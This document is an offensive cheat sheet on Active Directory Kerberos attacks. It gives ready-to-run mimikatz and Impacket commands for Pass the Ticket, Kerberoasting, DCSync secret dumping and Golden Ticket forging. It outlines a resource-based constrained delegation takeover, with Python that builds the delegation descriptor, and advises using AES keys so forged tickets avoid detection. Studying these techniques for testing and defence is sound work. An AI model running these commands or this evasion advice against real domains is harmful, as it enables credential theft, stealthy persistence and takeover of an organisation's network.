AD Kerberos (88)
The Kerberos protocol is a network authentication protocol that provides authentication between users and services on a network without sending passwords over the wire. Clients and services communicate with a Key Distribution Center (KDC), which in Active Directory runs on every Domain Controller and listens on port 88 (TCP and UDP). The KDC consists of two components:
- The Authentication Service (AS), which verifies the user's long-term key and issues a Ticket Granting Ticket (TGT)
- The Ticket Granting Service (TGS), which exchanges a valid TGT for service tickets
The KDC issues "tickets" that allow clients to authenticate to services without repeatedly sending passwords. A service ticket is encrypted with the long-term key of the account the service runs as, and the TGT with the key of the krbtgt account; most of the attacks below come down to obtaining or abusing one of these keys. This port is crucial for handling the authentication process for users, machines and services in the network.
To authenticate with Kerberos, you can use any Kerberos client, for example kinit on Linux or the Impacket tools with -k (they take the ticket from the credential cache named by KRB5CCNAME).
There are many different attacks on Kerberos; the most common ones are listed below.
Pass the Ticket
Once a valid Kerberos ticket is obtained (for example exported from LSASS with sekurlsa::tickets /export, which needs local administrator rights on the host), a PtT (Pass the Ticket) attack can be performed using mimikatz:
mimikatz "kerberos::ptt ticket.kirbi"
Replace "ticket.kirbi" with your Kerberos ticket file.
mimikatz injects this ticket into the current logon session, so any following command that speaks Kerberos (e.g. dir \\dc01\c$) is authenticated with this ticket instead of the current user's credentials; kerberos::list shows which tickets are loaded. The same works from Linux: convert the .kirbi file to a ccache with Impacket's ticketConverter.py, point KRB5CCNAME at it and run the Impacket tools with -k -no-pass. The ticket is only usable until it expires (10 hours by default for a TGT) and only from a host whose clock is within the allowed skew (5 minutes by default) of the DC.
GetUserSPNs
We can use GetUserSPNs.py from Impacket to list the user accounts that have a Service Principal Name (SPN) set and, with -request, to ask the TGS for a service ticket for each of them (Kerberoasting). Because such a ticket is encrypted with the service account's key, it can be cracked offline with hashcat (mode 13100 for RC4 tickets, 19600/19700 for AES128/AES256) or john; use -outputfile to save the hashes. Any valid domain account can do this, so the output also confirms which service accounts exist and, after cracking, which of them use weak passwords.
python GetUserSPNs.py -request -dc-ip 10.0.0.1 DOMAIN/user
Secrets Dumping
Once a privileged account is compromised, all domain secrets (NT hashes, Kerberos keys and, most importantly, the krbtgt key needed for a Golden Ticket) can be dumped to extend the attack.
Using secretsdump.py from Impacket:
python secretsdump.py -just-dc domain/Administrator:Password@10.0.0.1
Replace "domain/Administrator:Password" with a valid user and password. -just-dc pulls the data through the directory replication service (DCSync) instead of copying NTDS.dit, so the account needs replication rights (Domain Admins by default); add -just-dc-ntlm to get only the NT hashes, or -just-dc-user krbtgt to get only the krbtgt secrets.
Golden Ticket Attack
Creating a golden ticket (a forged TGT encrypted with the krbtgt account's key) gives access to the whole domain as any user, and it stays valid until the krbtgt password has been changed twice. It requires the domain SID and the krbtgt NT hash (or the AES key, passed with /aes256: instead of /krbtgt:), e.g. from secretsdump; the hash in the example below is a placeholder. Using mimikatz:
mimikatz "kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-XXXX /krbtgt:eeb9046b77d48962314e376f1925065a /id:500"
/id:500 is the RID of the built-in Administrator account; add /ptt to inject the ticket into the current session instead of writing a .kirbi file. Tickets forged with the RC4 key are easy to spot in 4769 events on a domain where AES is the norm, so prefer the AES key where you have it.
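The following toy model is an added example (not code from this page, from mimikatz or from Impacket) that ties together the KDC description at the top of the page, the GetUserSPNs.py/Kerberoasting step and the Golden Ticket: the KDC seals a TGT with the krbtgt key and service tickets with the service account's key, an ordinary user requests a ticket for an SPN and cracks it offline, and a TGT forged with the krbtgt key is accepted without any account lookup. Assumptions: the cipher is a toy HMAC-SHA256 keystream with an HMAC tag, the key derivation only mimics the shape of the real enctypes (no MD4, and PBKDF2 without the final DK step), the PAC is a JSON object, and all principal names, passwords and the wordlist are made up.

```python
# Toy model of Kerberos ticket issuance (added example, not the page's, mimikatz's
# or Impacket's code). Toy cipher and simplified key derivation: see the lead-in.
import hashlib
import hmac
import json
import os

REALM = "CORP.LOCAL"


def derive_key(password, principal, etype):
    """Long-term key. Real RC4-HMAC: MD4(UTF-16LE(pw)), no salt, no stretching;
    real AES enctypes: PBKDF2-HMAC-SHA1(pw, REALM+principal, 4096) then DK()."""
    if etype == "rc4":
        return hashlib.sha256(password.encode("utf-16-le")).digest()
    if etype == "aes":
        salt = (REALM + principal).encode()
        return hashlib.pbkdf2_hmac("sha1", password.encode(), salt, 4096, 32)
    raise ValueError(f"unsupported etype {etype}")


def _keystream(key, nonce, length):
    blocks = (hmac.new(key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
              for i in range((length + 31) // 32))
    return b"".join(blocks)[:length]


def encrypt(key, plaintext):
    """Toy authenticated encryption: HMAC keystream XOR, then an HMAC tag."""
    nonce = os.urandom(16)
    ct = bytes(p ^ s for p, s in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def decrypt(key, blob):
    """Plaintext, or None when the tag fails to verify (wrong key or tampering)."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        return None
    return bytes(c ^ s for c, s in zip(ct, _keystream(key, nonce, len(ct))))


class ToyKDC:
    """Holds every principal's long-term secret, as NTDS.dit on a DC does."""

    def __init__(self):
        self.accounts = {  # principal -> (password, enctypes the account supports)
            "alice": ("CorrectHorseBattery", ["aes", "rc4"]),
            "svc_web": ("P@ssw0rd", ["aes", "rc4"]),  # user account that owns an SPN
            "dc01$": (os.urandom(16).hex(), ["aes"]),  # machine account, random password
            "krbtgt": (os.urandom(16).hex(), ["aes"]),
        }
        self.spns = {"HTTP/web01.corp.local": "svc_web", "CIFS/dc01.corp.local": "dc01$"}
        self.krbtgt_key = derive_key(self.accounts["krbtgt"][0], "krbtgt", "aes")

    def as_req(self, client, password):
        """AS exchange: prove the client's key, receive a TGT sealed with the krbtgt key."""
        if self.accounts.get(client, (None,))[0] != password:
            raise PermissionError("KDC_ERR_PREAUTH_FAILED")
        return encrypt(self.krbtgt_key, json.dumps({"cname": client, "groups": ["Domain Users"]}).encode())

    def tgs_req(self, tgt, spn, client_etypes):
        """TGS exchange: the KDC trusts whatever the TGT says (only the krbtgt key could
        have sealed it) and uses the first client-offered etype the service supports."""
        pac = decrypt(self.krbtgt_key, tgt)
        if pac is None:
            raise PermissionError("KRB_AP_ERR_MODIFIED")
        account = self.spns[spn]
        password, supported = self.accounts[account]
        etype = next(e for e in client_etypes if e in supported)
        body = dict(json.loads(pac), sname=spn, key=os.urandom(32).hex())
        # Sealed with the *service's* long-term key and handed to any requester.
        return etype, encrypt(derive_key(password, account, etype), json.dumps(body).encode())


WORDLIST = ["Summer2023!", "Welcome1", "P@ssw0rd", "Winter2024!"]  # constructed wordlist


def kerberoast(ticket, etype, account, wordlist):
    """Offline guessing: a candidate yields a key; if the ticket's tag verifies under
    it, the candidate is the service password. Each AES guess costs 4096 PBKDF2 rounds."""
    for candidate in wordlist:
        if decrypt(derive_key(candidate, account, etype), ticket) is not None:
            return candidate
    return None


def roast_demo(client_etypes=("rc4",)):
    """A plain domain user obtains a ticket for the SPN, then cracks it offline."""
    kdc = ToyKDC()
    tgt = kdc.as_req("alice", "CorrectHorseBattery")
    etype, ticket = kdc.tgs_req(tgt, "HTTP/web01.corp.local", list(client_etypes))
    return etype, kerberoast(ticket, etype, "svc_web", WORDLIST)


def golden_demo():
    """With the krbtgt key (DCSync/secretsdump) an attacker forges a TGT for any name
    and group; the KDC issues service tickets for it without any account lookup."""
    kdc = ToyKDC()
    forged = encrypt(kdc.krbtgt_key, json.dumps({"cname": "Administrator", "groups": ["Domain Admins"]}).encode())
    _, ticket = kdc.tgs_req(forged, "CIFS/dc01.corp.local", ["aes"])
    dc_key = derive_key(kdc.accounts["dc01$"][0], "dc01$", "aes")
    return json.loads(decrypt(dc_key, ticket))  # what the DC's CIFS service would see
```

Calling roast_demo(("rc4",)) and roast_demo(("aes", "rc4")) both return the cracked password "P@ssw0rd" from the same wordlist, but with PBKDF2 every AES guess costs about 4096 times as much as an RC4 one, which is why Kerberoasting tools ask for RC4 wherever the service account still allows it; golden_demo() returns a ticket body naming Administrator in Domain Admins although no such logon ever happened at the KDC.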
Abusing Kerberos resource-based constrained delegation (RBCD)
This targets a domain computer: an attacker-controlled computer account is allowed to delegate to the target, and impersonated service tickets (S4U2self followed by S4U2proxy) are then requested for service principals of the target computer. Such tickets give access to services on the target like CIFS, HTTP, etc. as the impersonated account, so impersonating a privileged user usually means takeover of the computer. Accounts marked "sensitive and cannot be delegated" or members of Protected Users cannot be impersonated this way.
Prerequisites:
- a domain account with write access to the target computer (precisely, write access to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer domain object)
- permission to create new computer accounts (this is usually the default, see MachineAccountQuota, 10 by default), or control over an existing account that has an SPN
- LDAP (389/tcp) or LDAPS (636/tcp), and SAMR (445/tcp) access to the DC
- Kerberos (88/tcp) access to the DC
Very basic overview of the attack path:
1. Create a fake computer account (e.g. addcomputer.py from Impacket)
2. Write the fake computer's SID into the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target (e.g. rbcd.py from Impacket)
3. Request impersonated Service Tickets (S4U) for the target computer as the fake computer (e.g. getST.py -impersonate from Impacket)
4. Use the ticket (export KRB5CCNAME) against the target, e.g. with psexec.py or secretsdump.py and -k -no-pass
https://github.com/tothi/rbcd-attack/tree/master
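Step 2 of the attack path writes a binary security descriptor into msDS-AllowedToActOnBehalfOfOtherIdentity. The following added example (not code from the rbcd-attack repository or from Impacket) builds that value with the standard library only and parses it back, which is also the check a defender runs over every computer object to find unexpected delegation grants. The access mask 0xF01FF is the full-control mask the common tooling writes; the owner SID (BUILTIN\Administrators), the fake computer's SID and the host names are assumptions.

```python
# Encoder/decoder for the msDS-AllowedToActOnBehalfOfOtherIdentity value (added
# example, not code from the rbcd-attack repository or Impacket). Standard library only.
import struct

FULL_CONTROL = 0xF01FF                      # access mask the common RBCD tooling writes
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 4
OWNER_SID = "S-1-5-32-544"                  # BUILTIN\Administrators; assumed owner


def sid_to_bytes(sid):
    """'S-1-5-21-a-b-c-rid' -> binary SID: Revision, SubAuthorityCount,
    6-byte big-endian IdentifierAuthority, little-endian 32-bit sub-authorities."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"not a SID: {sid}")
    authority, subs = int(parts[2]), [int(p) for p in parts[3:]]
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + b"".join(struct.pack("<I", s) for s in subs)


def sid_from_bytes(data, off=0):
    """Parses a binary SID at offset `off`; returns (sid_string, bytes_consumed)."""
    count = data[off + 1]
    authority = int.from_bytes(data[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, off + 8)
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_descriptor(allowed_sids):
    """Self-relative SECURITY_DESCRIPTOR: 20-byte header, owner SID, then a DACL
    holding one ACCESS_ALLOWED_ACE (full control) per SID allowed to delegate."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE: AceType(1) AceFlags(1) AceSize(2) Mask(4) SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    # ACL: AclRevision(1) Sbz1(1) AclSize(2) AceCount(2) Sbz2(2)
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(OWNER_SID)
    # Header: Revision Sbz1 Control OffsetOwner OffsetGroup OffsetSacl OffsetDacl
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 20, 0, 0, 20 + len(owner))
    return header + owner + dacl


def allowed_sids(descriptor):
    """Reads back which SIDs an attribute value lets act on behalf of other identities:
    the check a defender runs over every computer object to spot unexpected RBCD grants."""
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", descriptor, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", descriptor, dacl_off)
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", descriptor, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(sid_from_bytes(descriptor, off + 8)[0])
        off += ace_size
    return sids


if __name__ == "__main__":
    # Constructed SID of the attacker's fake computer account (step 1 of the attack path).
    fake_computer_sid = "S-1-5-21-1004336348-1177238915-682003330-1105"
    value = build_rbcd_descriptor([fake_computer_sid])
    print(len(value), value.hex())  # 80 bytes; this is what the LDAP modify writes
    print(allowed_sids(value))      # ['S-1-5-21-1004336348-1177238915-682003330-1105']
```

The resulting bytes are written with an LDAP modify (replace) of msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer object; rbcd.py -action write from Impacket does exactly this, and rbcd.py -action read (or the decoder above against the raw attribute) shows what is currently granted. Step 3 then becomes getST.py -spn cifs/<target fqdn> -impersonate Administrator domain/FAKE$:password, after which the ccache it saves is used through KRB5CCNAME.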
Further Links
A collection of techniques that exploit and abuse Active Directory, Kerberos authentication, Domain Controllers and similar matters.
Abusing AD Discretionary Access Control Lists (DACLs) and Access Control Entries (ACEs)
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces.md
Abusing AD with BloodHound
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux.md
AD enumeration with an AD module without RSAT or administrator privileges
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges.md
AD Enumeration with PowerView
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview.md
AD account password spraying
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying.md
Child Domain Admin to Enterprise Admin
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain.md
Domain compromise via DC print server and kerberos delegation
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation.md
Kerberos unrestricted delegation
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation.md
DCSync - Dump password hashes from a Domain Controller
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync.md
From DnsAdmins to SYSTEM to domain compromise
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise.md
Backdooring AdminSDHolder for persistence
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence.md
Kerberoasting - Requesting RC4 encrypted TGS when AES is enabled
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled.md
Kerberos Silver Tickets
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets.md
Pass-the-Hash with Machine$ accounts
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts.md
Privileged accounts and token privileges
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges.md
Kerberos resource based constrained delegation - Computer object take-over
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution.md
DCShadow - Becoming a rogue domain controller
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow.md
Using DACLs to check AD object permissions
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions.md